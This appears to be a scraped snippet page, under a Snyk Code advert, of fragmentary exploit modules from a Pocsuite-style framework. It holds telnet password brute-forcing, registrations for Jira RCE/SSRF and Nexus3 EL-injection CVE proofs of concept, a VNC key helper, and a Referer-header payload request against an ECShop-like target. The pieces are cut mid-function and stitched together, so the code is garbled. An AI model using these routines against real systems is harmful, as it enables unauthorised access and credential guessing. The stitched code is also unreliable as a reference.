Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.
task_queue.queue.clear()
result_queue.put((username, password))
def telnet_burst(host, port):
if not port_check(host, port):
return
try:
task_init(host, port)
run_threads(1, task_thread)
except Exception:
pass
register_poc(DemoPOC)
return
if anonymous_login(host, port):
logger.info('try burst {}:{} use username:{} password:{}'.format(
host, port, 'anonymous', ''))
result_queue.put(('anonymous', ''))
return
try:
task_init(host, port)
run_threads(4, task_thread)
except Exception:
pass
register_poc(DemoPOC)
#漏洞攻击
def _attack(self):
return self._verify()
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
register_poc(NFS_POC)
def _attack(self):
return self._verify()
# 输出报告
def save_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
# 注册类
register_poc(Jira_RCE_POC) # CVE-2019-11581
register_poc(Jira_SSRF_POC) # CVE-2019-8451
return False
# 攻击模块
def _attack(self):
return self._verify()
# 输出报告
def save_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
register_poc(Nexus3_2020_10204_EL_INJECTION_POC)
# 攻击模块
def _attack(self):
return self._verify()
# 输出报告
def save_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
register_poc(Nexus3_2018_16621_EL_INJECTION_POC)
def gen_key(self, key):
newkey = []
for ki in range(len(key)):
print(key[ki])
print(str(key[ki]))
bsrc = ord(str(key[ki]))
btgt = 0
for i in range(8):
if bsrc & (1 << i):
btgt = btgt | (1 << 7-i)
newkey.append(btgt)
return ''.join(chr(c) for c in newkey)
register_poc(VNC_POC)
elif option == '3.x':
payloads = [(ec3payload, '3.x')]
# payloads = [ec2payload, ec3payload]
for payload in payloads:
headers = {'Referer': payload[0]}
resp = requests.get(url, headers=headers)
r = get_middle_text(resp.text, '''<input value="''', " name="back_act" type="hidden">")
if r:
return r
r = get_middle_text(resp.text, '''
try:
requests.get(veri_url1)
requests.post(veri_url2, data=data, headers=headers)
except Exception as e:
logger.warn(str(e))
def parse_verify(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(DemoPOC)
logger.error(str(ex))
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
_attack = _verify
register_poc(DemoPOC)